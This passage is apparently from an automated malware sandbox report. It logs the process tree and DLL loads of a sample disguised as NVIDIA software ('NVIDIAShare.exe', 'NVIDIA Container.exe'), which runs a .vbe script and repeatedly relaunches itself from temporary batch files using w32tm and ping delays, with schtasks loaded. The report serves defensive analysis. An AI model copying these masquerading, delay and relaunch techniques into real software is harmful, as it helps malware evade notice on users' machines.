                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" Jump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" "Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: policymanager.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: msvcp110_win.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: ktmw32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: dlnashext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: wpdshext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: mscoree.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeSection loaded: apphelp.dllJump to behavior
